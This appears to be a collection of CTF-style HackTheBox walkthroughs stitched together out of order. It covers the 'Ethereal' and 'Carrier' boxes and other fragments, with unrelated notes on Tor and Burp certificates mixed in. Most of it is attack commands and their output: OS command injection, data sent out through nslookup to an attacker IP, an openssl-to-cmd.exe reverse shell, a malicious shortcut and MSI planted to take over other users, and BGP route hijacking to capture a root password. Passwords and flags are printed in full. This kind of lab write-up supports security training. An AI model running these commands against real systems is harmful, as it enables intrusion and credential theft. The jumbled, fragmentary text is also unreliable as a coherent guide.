We can find a login page in “/admin” port 9999.
This login console is controlled by “/admin/js/login.js” and we can find the password “superduperlooperpassword_lol”.
root@kali:~# curl http://10.10.10.111:9999/admin/js/login.js
var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;if( username =="admin"&& password =="superduperlooperpassword_lol"){
alert ("Login successfully");
window.location ="success.html"; // Redirecting to other page.
return false;}else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled =true;
document.getElementById("password").disabled =true;
document.getElementById("submit").disabled =true;return false;}}}
In the redirected page “/admin/success.html”, there is a “encrypted message”
This does not make any sense. However, we can use This website to interpret this encrypted code.
We got an interesting information. Let’s try /asdiSIAJJ0QWE9JAS.
There is a bese64 encoded message.
We can figure out what’s this message by following command.
root@kali:~# echo-n UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64-d> b64file
root@kali:~# file b64file
b64file: Zip archive data, at least v2.0 to extract
Sounds like we got a .zip file. This has password protection but the pass is simply guessable “password”.
By debugging with gdb, we can see the execution failed because it tried to jump to memory address “0x62413762”
root@kali:~# gdb rop
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty"for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration"for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type"help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /root/rop Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Program received signal SIGSEGV, Segmentation fault.
0x62413762 in ?? ()
This address “0x62413762” is from our payload. By using “pattern_offset.rb”, we know the size of buffer is 52.
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x62413762
[*] Exact match at offset 52
Then, we need information about where is the address of “libc.so.6”
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of “Ethereal”.
Solution:
1. Initial Enumeration
TCP Port scanning:
root@kali:~# nmap -p- 10.10.10.106 -sV-sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-07 19:56 EET
Stats: 0:20:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.77% done; ETC: 20:23 (0:06:33 remaining)
Nmap scan report for 10.10.10.106
Host is up (0.12s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1628.08 seconds
FTP enumeration:
root@kali:~# ftp 10.10.10.106
Connected to 10.10.10.106.
220 Microsoft FTP Service
Name (10.10.10.106:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-10-18 09:03PM <DIR> binaries
09-02-09 08:58AM 4122 CHIPSET.txt
01-12-03 08:58AM 1173879 DISK1.zip
01-22-11 08:58AM 182396 edb143en.exe
01-18-11 11:05AM 98302 FDISK.zip
07-10-18 08:59PM <DIR> New folder
07-10-18 09:38PM <DIR> New folder (2)
07-09-18 09:23PM <DIR> subversion-1.10.0
11-12-16 08:58AM 4126 teamcity-server-log4j.xml
226 Transfer complete.
Try each patterns and we can find following credential to login ethereal.htb:8080
alan:!C414m17y57r1k3s4g41n!
Sounds like “ping” command is executed internally.
Then, try OS command injection by putting some windows OS command in the textbox and submit.
We can easily figure out this command is available.
127.0.0.1 & ping 10.10.14.23
We can confirm the result by tcpdump
root@kali:~# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vvfor full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
18:51:03.070436 IP ethereal.htb > kali: ICMP echo request, id 1, seq 17, length 40
18:51:03.070476 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 17, length 40
18:51:04.222480 IP ethereal.htb > kali: ICMP echo request, id 1, seq 18, length 40
18:51:04.222522 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 18, length 40
18:51:05.231877 IP ethereal.htb > kali: ICMP echo request, id 1, seq 19, length 40
18:51:05.231910 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 19, length 40
18:51:06.875927 IP ethereal.htb > kali: ICMP echo request, id 1, seq 20, length 40
18:51:06.875966 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 20, length 40
To send some information, we can enter following command and to receive it, responder is available.
127.0.0.1 & nslookup test 10.10.14.23
root@kali:~# responder -I tun0
~~~
[+] Listening for events...
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .test
We can try to execute os command and its output by following command.
# 10.10.14.23 & for /f %i in ('whoami') do nslookup %i 10.10.14.23[+] Listening for events...
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .etherealalan
From now on, we can proceed our enumeration.
For example, current directory is “C:\windows\system32\inetsrv”
# 10.10.14.23 & for /f %i in ('cd') do nslookup %i 10.10.14.23[+] Listening for events...
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .c.windowssystem32inetsrv
User enumeration:
# 10.10.14.23 & for /f %i in ('dir /B "C:\Users"') do nslookup %i 10.10.14.23[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Administrator
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .alan
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .jorge
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Public
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .rupal
Installed Program enumeration:
# 10.10.14.23 & for /f %i in ('dir /B "C:\Program Files (x86)"') do nslookup %i 10.10.14.23[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Common
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Internet
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Microsoft
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Microsoft
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Microsoft.NET
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .MSBuild
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .OpenSSL.v1.1.0
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Reference
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .WindowsPowerShell
Interesting information is that we have openssl v1.1.0 installed.
# 10.10.14.23 & netsh advfirewall firewall show rule name=all | findstr "Rule Name:" > C:\Users\Public\Desktop\Shortcuts\fw.txt# 10.10.14.23 & for /f %i in ('dir /B "C:\Users\Public\Desktop\Shortcuts"') do nslookup %i 10.10.14.23# 10.10.14.23 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type C:\users\public\desktop\shortcuts\fw.txt') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.23[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
According to this information, we have 2 ports for connection 73, 136.
Then, try to have a remote connection
root@kali:~# openssl req -x509-newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
.................................................................................................................................++++
..........................++++
writing new private key to 'key.pem'-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code)[AU]:
State or Province Name (full name)[Some-State]:
Locality Name (eg, city)[]:
Organization Name (eg, company)[Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section)[]:
Common Name (e.g. server FQDN or YOUR name)[]:
Email Address []:
root@kali:~# ls-la-rw-r--r-- 1 root root 1939 Mar 10 13:25 cert.pem
-rw------- 1 root root 3272 Mar 10 13:24 key.pem
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:73 | cmd.exe | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136
root@kali:~# openssl s_server -quiet-key key.pem -cert cert.pem -port 73
Pinging 10.10.14.23 with 32 bytes of data:
Reply from 10.10.14.23: bytes=32 time=34ms TTL=63
Reply from 10.10.14.23: bytes=32 time=38ms TTL=63
Ping statistics for 10.10.14.23:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 34ms, Maximum = 38ms, Average = 36ms
root@kali:~# openssl s_server -quiet-key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
After that, by writting a command on terminal port 73 and refrashing the page, we can execute our commands.
Directory of C:\users\alan\desktop
07/07/2018 11:08 PM <DIR> .
07/07/2018 11:08 PM <DIR> ..
07/07/2018 11:07 PM 160 note-draft.txt
1 File(s) 160 bytes
2 Dir(s) 15,437,340,672 bytes free
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
There is no user.txt in C:\Users\alan\desktop.
However, there is an interesting text file.
c:\windows\system32\inetsrv>type C:\users\alan\desktop\note-draft.txt
I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.
- Alan
c:\windows\system32\inetsrv>dir C:\users\public\desktop\shortcuts
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of C:\users\public\desktop\shortcuts
03/10/2019 11:01 AM <DIR> .
03/10/2019 11:01 AM <DIR> ..
03/10/2019 11:02 AM 2,494 fw.txt
07/06/2018 02:28 PM 6,125 Visual Studio 2017.lnk
2 File(s) 8,619 bytes
2 Dir(s) 15,436,517,376 bytes free
To take advantage of this, create our payload to obtain other user shell.
We can use LNKUp.
After that, run the ssl server again which serves vs-mod.lnk.
This does not output any message in the console but don’t worry.
root@kali:~# openssl s_server -quiet-key key.pem -cert cert.pem -port 136 < vs-mod.lnk
# then, run following payload to upload shell on web ping console# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136 > "C:\Users\Public\Desktop\Shortcuts\vs-mod.lnk"
After that, we can confirm we have vs-mod.lnk in /shortcuts.
c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:\users\public\desktop\shortcuts
03/10/2019 12:28 PM <DIR> .
03/10/2019 12:28 PM <DIR> ..
03/10/2019 11:02 AM 2,494 fw.txt
07/06/2018 02:28 PM 6,125 Visual Studio 2017.lnk
03/10/2019 12:26 PM 520 vs-mod.lnk
3 File(s) 9,139 bytes
2 Dir(s) 15,435,431,936 bytes free
Then, change the name of “vs-mod.lnk” to “Visual Studio 2017.lnk”
# put this command on openssl server serves port 73
del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy /Y "c:\users\public\desktop\shortcuts\vs-mod.lnk""c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & dir c:\users\public\desktop\shortcuts
c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:\users\public\desktop\shortcuts
03/10/2019 12:39 PM <DIR> .
03/10/2019 12:39 PM <DIR> ..
03/10/2019 11:02 AM 2,494 fw.txt
03/10/2019 12:26 PM 520 Visual Studio 2017.lnk
03/10/2019 12:26 PM 520 vs-mod.lnk
3 File(s) 3,534 bytes
2 Dir(s) 15,435,128,832 bytes free
After that, immediately rerun these servers again.
A few minutes later, we can achieve user shell whose user is “jorge”.
The user.txt is as always in the directory of “desktop”.
root@kali:~# openssl s_server -quiet-key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\jorge\Documents>whoami
whoami
ethereal\jorge
C:\Users\jorge\Documents>type C:\Users\jorge\desktop\user.txt
2b9a4ca09408b4a39d87cbcd7bd524dd
3. Getting Root
If we check other device on Ethereal, we can find additional drive “D:".
C:\Users\jorge\Documents>fsutil fsinfo drives
Drives: C:\ D:\
C:\Users\jorge\Documents>dir D:\
Volume in drive D is Development
Volume Serial Number is 54E5-37D1
Directory of D:\
07/07/2018 09:50 PM <DIR> Certs
06/27/2018 10:30 PM <DIR> DEV
07/16/2018 09:54 PM <DIR> Program Files (x86)
06/30/2018 09:05 PM <DIR> ProgramData
0 File(s) 0 bytes
4 Dir(s) 8,437,514,240 bytes free
We can find an interesting note in D:\DEV\MSIs.
C:\Users\jorge\Documents>type D:\DEV\MSIs\note.txt
Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already.
- Rupal
Sounds like we have to create a msi file which executes our payload.
Beforehand, we need some certs to sign our msi file.
We can find them in D:\Certs.
Then, we have to execute following commands.
“ethereal.msi” is in a directory “C:\Program Files\WiX Toolset v3.11\bin”.
C:\Program Files\WiX Toolset v3.11\bin>candle.exe c:\tmp\ethereal.wxs
Windows Installer XML Toolset Compiler version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.
ethereal.wxs
C:\Program Files\WiX Toolset v3.11\bin>light.exe ethereal.wixobj
Windows Installer XML Toolset Linker version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.
c:\tmp\ethereal.wxs(6) : warning LGHT1079 : The cabinet 'product.cab' does not c
ontain any files. If this installation contains no files, this warning can like
ly be safely ignored. Otherwise, please add files to the cabinet or remove it.
c:\tmp\ethereal.wxs(10) : error LGHT0204 : ICE18: KeyPath for Component: 'Applic
ationFiles' is Directory: 'INSTALLLOCATION'. The Directory/Component pair must b
e listed in the CreateFolders table.
Sign the msi file
At first, we have to install Windows SDK.
Then, we have to decode base 64 encoded .cer file and .pvk file.
Decode MyCA.cer:
After that, we have to upload the msi file. We can do this just like when we uploaded vs-mod.lnk.
C:\Users\jorge\Documents>copy c:\users\public\desktop\shortcuts\ethereal.msi d:\dev\msis\ethereal.msi & dir d:\dev\msis
1 file(s) copied.
Volume in drive D is Development
Volume Serial Number is 54E5-37D1
Directory of d:\dev\msis
03/21/2019 11:25 AM <DIR> .
03/21/2019 11:25 AM <DIR> ..
03/21/2019 10:34 AM 663,552 ethereal.msi
07/18/2018 09:47 PM 133 note.txt
2 File(s) 663,685 bytes
2 Dir(s) 8,436,850,688 bytes free
What we have to do is just rerun these ssl servers and wait for couple of minutes.
After that, someone executes the uploaded msi and we can achieve a root shell.
root@kali:~# openssl s_server -quiet-key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\>whoami
ethereal\rupal
C:\>dir c:\users\rupal\desktop
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:\users\rupal\desktop
10/10/2018 05:16 <DIR> .
10/10/2018 05:16 <DIR> ..
04/07/2018 22:01 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,406,366,720 bytes free
C:\>type c:\users\rupal\desktop\root.txt
1cb6f1fc220e3f2fcc0e3cd8e2d9906f
How to install Tor browser on Kali linux(Not manually).
If we install Tor Browser manually, it runs as root user.
Besides, it’s not good way for maintenance.
How to install a Burp SSL certification to chrome.
I have done this more than 5 times but still I forget so took this memo.
Solution
1. SSL Error
Without any settings, if we use Burp with https, browser shows this certification error.
2. Download SSL cert
By accessing the Burp page on localhost, we can download the certificate “cacert.der”.
We have to click on the button “CA Certificate”.
3. Register the cert on google chrome
Go to settings and click “Advanced”. There is a menu “Manage certificates”.
Click “Authorities”, then “Import”.
After selected “cacert.der” downloaded, it shows some options.
Only choosing the first one “Trust this certificate for identifying websites” is enough.
4. Restart
Then, restart the chrome and it would be fine.
5. If still had a same error?
In this case, we can confirm the validity of certification on “Manage certificates”.
Click on “org-PortSwigger” and that certificate would be “untrusted”.
We can edit the certificate, or delete and install it again.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN)[10.10.10.105] 51590
bash: cannot set terminal process group (2281): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~#
Sounds like we got a root shell. However, we can not find root.txt anywhere.
This is because we’re not on 10.10.10.105
On the ticket page, we can find some info about this network.
We already know that Quagga is running on this server.
By enumeration, we can find additional servers which is realated to this server.
At the same time, we can assume this server is working on BGP and BGP hijacking is the possible solution.
r1# show ip bgp
show ip bgp
BGP table version is 0, local router ID is 10.255.255.1
Status codes: s suppressed, d damped, h history, * valid, > best, = multipath,
i internal, r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 10.78.10.0/24 0.0.0.0 0 32768 ?
*> 10.78.11.0/24 0.0.0.0 0 32768 ?
*> 10.99.64.0/24 0.0.0.0 0 32768 ?
* 10.100.10.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.11.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.12.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.13.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.14.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.15.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.16.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.17.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.18.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.19.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.20.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
*> 10.101.8.0/21 0.0.0.0 0 32768 i
*> 10.101.16.0/21 0.0.0.0 0 32768 i
*> 10.120.10.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.11.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.12.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.13.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.14.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.15.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.16.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.17.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.18.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.19.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.20.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
Total number of prefixes 27
Connections to the ftp server “10.120.15.10” are transmitted with eth2(10.78.11.2)
Then, try to capture the ftp network traffic.
BGP configuration:
root@r1:~# vtysh
vtysh
Hello, this is Quagga (version 0.99.24.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.
r1# conf t
conf t
r1(config)# router gbp 100
router gbp 100
% Unknown command.
r1(config)# router bgp 100
router bgp 100
r1(config-router)# network 10.120.15.0/25
network 10.120.15.0/25
r1(config-router)# end
end
r1# exit
Then, configure eth2 as ftp server address.
root@r1:~# ifconfig eth2 10.120.15.10 netmask 255.255.255.0 up
Capture the traffic with netcat.
If we wait couple of minutes, there is a connection from remote host.
By sending a response message “331 Please specify the password.”, we can ahieve a password for user root.
root@r1:~# nc -nlvp 21
nc -nlvp 21
Listening on [0.0.0.0] (family 0, port 21)
Connection from [10.78.10.2] port 21 [tcp/*] accepted (family 2, sport 52504)
USER root
331 Please specify the password.
PASS BGPtelc0rout1ng
We can not use this password for ftp.
However. we can take advantage of this to login to “10.10.10.105” with ssh.
root@kali:~# ssh root@10.10.10.105
The authenticity of host '10.10.10.105 (10.10.10.105)' can't be established.
ECDSA key fingerprint is SHA256:ocbg7qpaEpjQc5WGCnavYd2bgyXg7S8if8UaXgT1ztE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.105' (ECDSA) to the list of known hosts.
root@10.10.10.105's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Mar 19 17:48:44 UTC 2019
System load: 0.08 Users logged in: 0
Usage of /: 40.8% of 19.56GB IP address for ens33: 10.10.10.105
Memory usage: 32% IP address for lxdbr0: 10.99.64.1
Swap usage: 0% IP address for lxdbr1: 10.120.15.10
Processes: 211
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
4 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 5 14:32:15 2018
root@carrier:~# ls
root.txt secretdata.txt
root@carrier:~# cat root.txt
2832e552061532250ac2a21478fd4866